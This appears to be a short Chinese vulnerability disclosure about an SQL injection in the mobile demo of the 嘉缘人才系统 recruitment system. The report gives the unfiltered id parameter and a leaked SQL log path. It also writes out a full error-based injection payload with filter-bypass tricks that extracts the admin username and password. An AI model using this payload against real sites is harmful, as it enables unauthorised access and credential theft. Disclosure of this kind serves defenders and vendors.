### 简要描述:
官网DEMO测试
### 详细说明:
黑盒发现
嘉缘人才系统触屏版demo:
```
http:/m.rccms.com/person/index.php?t=ajax&keyword=&search_type=&btnArea=&id=963
```
其中id没有过滤
[<img src="https://images.seebug.org/upload/201503/13174923ab5193122f31b4e654e5a279fb3b38c0.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/13174923ab5193122f31b4e654e5a279fb3b38c0.png)
其中mysql报错,根据
[WooYun: 嘉缘人才系统最新版sql注入(直接出数据)](http://www.wooyun.org/bugs/wooyun-2015-0100830)
获得日志文件路径为
http://m.rccms.com/data/log/sql_6ecd87d0e5e1bd5ecc321bd2e1246e39.txt
构造如下exp
```
http://m.rccms.com/person/index.php?t=ajax&keyword=&search_type=&btnArea=&id=963 %0aand%0a@`'`%0aand%0a(SELECT 1 FROM(SELECT count(*),concat((SELECT(SELECT concat(a_user,0x27,a_pass)) FROM job_admin limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a)%23
```
成功爆出管理员密码
[<img src="https://images.seebug.org/upload/201503/131751596c46235bc961999ed07689fbf27c99f8.png" alt="8.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/131751596c46235bc961999ed07689fbf27c99f8.png)
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201503/131751596c46235bc961999ed07689fbf27c99f8.png" alt="8.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/131751596c46235bc961999ed07689fbf27c99f8.png)
京公网安备 11010502034610号
暂无评论